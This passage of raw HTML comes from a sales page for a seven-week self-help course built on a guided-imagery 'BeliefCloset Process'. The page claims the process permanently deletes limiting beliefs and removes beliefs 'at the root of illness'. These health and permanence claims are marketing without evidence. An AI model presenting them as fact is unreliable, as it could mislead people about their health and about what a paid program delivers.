blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In 